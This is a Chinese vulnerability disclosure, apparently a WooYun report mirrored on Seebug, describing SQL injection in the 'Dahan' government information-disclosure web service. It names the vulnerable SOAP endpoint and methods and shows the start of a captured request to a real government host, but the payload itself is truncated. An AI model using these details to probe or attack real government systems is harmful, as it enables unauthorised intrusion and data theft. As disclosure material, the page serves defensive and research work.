大汉政府信息公开多处SQL注入(附100个案例)

- AV AC AU C I A
发布: 2025-04-13
修订: 2025-04-13

### 简要描述: 大汉政府信息公开多处SQL注入(附100个案例) ### 详细说明: 不同系统,不同文件,真的重复了么? [<img src="https://images.seebug.org/upload/201503/20131757805ede245a27d1800a4e797d737ba7ac.png" alt="1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201503/20131757805ede245a27d1800a4e797d737ba7ac.png) ### 漏洞证明: webservice漏洞,漏洞存在于 /xxgk/services/WSSynchronize?wsdl WSSynchronize服务的多个方法,多个参数存在严重漏洞,且该漏洞普遍存在,如 wsGetWeb wsGetColumnStyle wsSynchronize wsSynchronizeWithPath 上述方法的多个参数均存在漏洞,这里随便选取一个方法(wsSynchronize)进行测试 用WSockExpert v0.7抓包,并保存为wooyun.txt ``` POST /xxgk/services/WSSynchronize?wsdl HTTP/1.1 Accept-Encoding: gzip,deflate Content-Type: text/xml;charset=UTF-8 SOAPAction: "" Content-Length: 222 Host: xxgk.lyg.gov.cn Connection: Close User-Agent: google robots <soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:web="http://webservice.blf.jcms">...

0%
暂无可用Exp或PoC
当前有0条受影响产品信息